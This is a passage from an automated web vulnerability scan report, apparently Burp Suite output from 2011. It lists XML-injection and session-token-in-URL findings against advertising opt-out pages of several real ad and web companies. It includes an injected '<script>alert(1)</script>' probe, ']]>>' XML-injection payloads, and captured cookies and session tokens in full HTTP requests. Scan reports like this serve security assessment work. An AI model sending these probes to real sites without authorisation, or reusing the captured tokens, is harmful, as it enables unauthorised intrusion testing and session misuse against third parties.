P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: XO=y=1&t=316&v=3&yoo=0&nwid1=20072115599&XTS=1321210427&XSIG=QAuKwaUxeydtPpQYn6JUothNCcU-;path=/; expires=Tue, 13-Nov-2013 20:00:00 GMT;domain=.yieldmanager.net
Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true&opter=nai14770<script>alert(1)</script>2edb24b05ff
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private
Content-Length: 902

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true&opter=nai14770<script>alert(1)</script>2edb24b05ff
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Cache-Control: private

The document has moved <A HREF="http://info.yahoo.com/nai/nai-v
...[SNIP]...

3. XML injection  previous  next
There are 8 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


3.1. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/OptOut.php?service=checkNAI&nocache=0.045439 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxVzjEOhDAMRNG75AQeJ8bBOYxFSU2JuDuLDEm2fpqv2Qx2HkaWUttstXM3aoehWoJCXZ2pOCmcHanthqH1p3i0kudQ7so0bSU0d83LpBRahq5vmUdZ%252FvXZouDTpatgKiNUu6pMWkLr0PqV5X11XTeYRkec

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:52:38 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.2. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/OptOut.php]]>>?service=checkNAI&nocache=0.045439 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxVzjEOhDAMRNG75AQeJ8bBOYxFSU2JuDuLDEm2fpqv2Qx2HkaWUttstXM3aoehWoJCXZ2pOCmcHanthqH1p3i0kudQ7so0bSU0d83LpBRahq5vmUdZ%252FvXZouDTpatgKiNUu6pMWkLr0PqV5X11XTeYRkec

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:52:38 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.3. http://pixel.adblade.com/optoutnai.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.adblade.com
Path:   /optoutnai.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optoutnai.php]]>>?action=status&nocache=0.5795056 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:52:37 GMT
Server: lighttpd/1.4.21

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.4. http://s.ytimg.com/yt/swfbin/cps-vflHPStfQ.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflHPStfQ.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/swfbin]]>>/cps-vflHPStfQ.swf HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:52:55 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.5. http://s.ytimg.com/yt/swfbin/cps-vflHPStfQ.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflHPStfQ.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/swfbin/cps-vflHPStfQ.swf]]>> HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:52:56 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.6. http://www.nexac.com/nai_optout.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_optout.php]]>>?nocache=0.5815065 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:54:16 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.7. http://www.nexac.com/nai_status.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_status.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_status.php]]>>?nocache=0.9960775 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:52:01 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.8. http://www.nexac.com/nai_verify.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_verify.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_verify.php]]>> HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; na_id=ignore

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sun, 13 Nov 2011 18:55:38 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

4. Session token in URL  previous  next
There are 13 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1499749799; token_nai_adsonar_com=174796341; token_nai_tacoda_at_atwola_com=687446498; token_nai_adtech_de=194198501; token_nai_ad_us-ec_adtechus_com=1230812852; token_nai_adserver_adtechus_com=411946761; token_nai_adserverec_adtechus_com=633460859; token_nai_adserverwc_adtechus_com=1742489720; token_nai_glb_adtechus_com=293319859; s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:53:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13644


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='optOut();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=1499749799' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=174796341' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=687446498' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=194198501' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=1230812852' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=411946761' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=633460859' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=1742489720' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=7193487&token=293319859' height='1' width='1'></iframe>
...[SNIP]...

4.2. http://info.yahoo.com/nai/optout.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://info.yahoo.com
Path:   /nai/optout.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/optout.html?token=cVRuZVptSHJ4UjM- HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; CH=AgBOpL8gAC6fIAAHciAAMXwgAB/fIAAABiAAAV0gAAIyIAAh5yAAJo8gACrM

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AO=o=1; expires=Thu, 13-Nov-2031 15:09:03 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; expires=Wed, 13-Nov-2013 18:53:43 GMT; path=/; domain=.yahoo.com
Location: http://open.ad.yieldmanager.net/V1/NWSetter?nwid1=20072115599&url=http://info.yahoo.com/nai/nai-verify.html?optoutverify=true%26opter=nai&XTS=1321210423&XSIG=0~d5fc1b609f1ce455e216ef1819125ff12eafa53b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 81

<!-- w1.help.sp2.yahoo.com uncompressed/chunked Sun Nov 13 18:53:43 UTC 2011 -->

4.3. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1230812852 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1230812852

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.ad.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.us-ec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.ad.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.ad.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.us-ec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=2&participant_id=4&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.4. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=411946761 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=411946761

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserver.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserver.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserver.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserver.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Location: http://nai.adserver.adtechus.com/nai/daa.php?action_id=2&participant_id=5&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.5. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=633460859 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=633460859

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserverec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserverec.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.nai.adserverec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adserverec.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:05 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:45 GMT;domain=adtechus.com;path=/
